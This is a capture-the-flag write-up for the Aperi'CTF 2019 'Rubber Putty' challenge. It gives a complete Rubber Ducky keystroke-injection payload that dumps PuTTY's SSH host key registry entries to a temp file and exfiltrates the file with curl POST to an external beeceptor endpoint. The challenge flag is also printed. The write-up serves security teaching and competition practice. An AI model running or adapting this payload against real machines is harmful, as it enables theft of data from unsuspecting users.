Rubber Putty

Aperi'CTF 2019 - Physical (100 pts).

Aperi’CTF 2019 - Rubber Putty

Challenge details

Event Challenge Category Points Solves
Aperi’CTF 2019 Rubber Putty Physical 100 ???

L’utilisateur du PC ducky semble enregistrer ses session Putty sur son ordinateur. Récupérer les clé SSH stoquées par Putty. L’exfiltration des données peut se faire à l’aide d’internet uniquement. Le flag respecte le format APRK{…}.

TL;DR

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys > %Temp%/mysecretssh.txt
curl -X POST -d @%Temp%/mysecretssh.txt https://aperictf.free.beeceptor.com/key

Methodology

We need to copy extract PuTTY sessions to an internet endpoint using only a Rubber Ducky HID key:
This key is a USB key which act like a keyboard: once plugged, it will type the payload we want. See this Youtube Video for more explanation about Rubber Ducky.

To complete the challenge, I had a quick look on internet to know Where does PuTTY store known_hosts information on Windows:
HKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys. This key can be printed using the command reg query [keypath]. We can dump our key to a file with this command: reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys > %Temp%/mysecretssh.txt.

Now that we know how to store SSH keys in a file, we need to upload the file to an endpoint on internet. For this, you can set an HTTP server or use an endpoint such as beeceptor. Since curl is installed on the Ducky computer, we’ll use it to send our mysecretssh.txt to our beeceptor: curl -X POST -d @%Temp%/mysecretssh.txt https://aperikube.free.beeceptor.com/keys. Note the @ to specify file location.

Here is the final ducky payload:

DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys > %Temp%/mysecretssh.txt
ENTER
DELAY 1000
STRING curl -X POST -d @%Temp%/mysecretssh.txt https://aperikube.free.beeceptor.com/keys
ENTER

After that, we compiled the script on ducktoolkit.com/encode with FR layout, put the file on the Micro SD using the adaptator and plug the Rubber Ducky.

Once plugged, we got a request on our beeceptor:

beeceptor.jpg

Flag

APRK{R3g1$TRY_K3Y_3xF1LtRAT10n}

Zeecka